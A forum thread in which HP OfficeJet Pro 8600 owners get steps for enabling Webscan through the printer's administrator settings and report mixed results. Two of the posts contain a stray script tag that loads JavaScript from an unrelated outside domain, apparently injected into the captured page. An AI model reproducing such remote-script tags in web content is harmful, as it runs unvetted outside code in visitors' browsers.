Question

Top Student
AuntieEvil
Message 1 of 9 (8,765 Views)

How do I enable webscan? Or, why is it disabled?

I installed my 8600 OfficeJet Pro printer to my wireless network.  I can do everything I've attempted so far, except webscan.  When I go to the webscan page, I get "You cannot use this function because it has been disabled. For more information, contact your network administrator or the person who set up the printer."  *I* am my network administrator.  *I* set up the printer.  I can't find anything in the documentation for either the wireless router or the printer that describes how to enable webscan, which I am assuming at this point is a service (no services are blocked in my router)..  What do I need to do?

Printer: Oficejet Pro 8600 N911a

router: Netgear WNR1000v2

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Grad Student
Herculean
Message 2 of 9 (8,743 Views)

Re: How do I enable webscan? Or, why is it disabled?

Hello,

Webscan is initially disabled for security purposes.

To enable it, go back to your printer's EWS by entering the IP address in your web browser.

-Click on Settings tab

-Click on Administrator settings

-Click OK to get redirected to a secure page.

-Click Continue to Website (accept the certificate)

-Check the checkbox to Enable Webscan

-Click Apply to save the settings

Show support by clicking the blue Kudos star in the post that resolved your problem. Doing so will help other forum members find their solutions too.

Top Student
AuntieEvil
Message 3 of 9 (8,731 Views)

Again I missed the obvious (the settings tab).  Thanks.  Worked like a charm.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Honor Student
JeweloftheDelta
Message 4 of 9 (7,377 Views)

Your instructions work! . . . <F5> Refresh or close all browser.

Honor Student
typoboy
Message 5 of 9 (7,160 Views)

[ Edited ]

That is So-o-o not "obvious," at least on the Mac version of the software. There is noting about the install process,or EWS interface that would suggest that, as you set up the hardware and go on to configure the printer on the PC ot Mac, that you should have to set admin permissions for this one capability, after darn near every other default does NOT require you to enter that option. It's patently bad interface and interaction design.

Student
cjlewyn
Message 6 of 9 (5,694 Views)

Hi,

When I tried this solution, everything was fine until I got to the part where it says Administrator settings then click ok to go to secure page, I get the big red page indicating that I am on an unsafe page. I'm not sure whether to proceed or not, and/or what to do to finish the process. Thanks very much.

Grad Student
Herculean
Message 7 of 9 (5,691 Views)

Hi cjlewyn,

What you are experiencing is normal behavior.

This screen is just warning you that the browser is going into a secure state with the connected printer.

Click "Continue Anyway" or "Confirm Exception" to continue and you should be golden.

Thanks

Top Student
blumist
Message 8 of 9 (1,088 Views)

I tried all the suggestions,including going to the unsafe page which I was warned my security could be comprimised.
The browser tab had huge 'x' through hhtp [or whatever the first letters are-cant remember!]
Then the next page said internal error..with huge red cross next to it.
Unsurprisingly I have not been able tp enable webscan !!!

Top Student
shemphill
Message 9 of 9 (1,020 Views)

Thank heaven for you and for taking your time to help us.

I have suffered for almost a week on this, and your suggestion at least did get me to be able to scan via a usb.

I still cannot connect right.

My HP 8600 says it's connected. My computer says it is connected. I can even print from my computer to the 8600 BUT I DON"T WANT TO PRINT, I WANT TO SCAN (forgive my frustration).

I have been able to scan ok except for these intermittent times when the scanner disconnects and it takes me DAYS -- literally DAYS to try to fix it.
But thank you for this tip. You saved the day.

I just wish I could figure the rest out.

I hate these error messages about "administrators" because we are the administrators and it just takes us days to figure out how to get  by the error message.

Tell HP to get rid of those "admin" errors - that's what causes most of the delay, just trying to find out how to toggle that admin. setting. Thanks again

† The opinions expressed above are the personal opinions of the authors, not of HP. By using this site, you accept the Terms of Use and Rules of Participation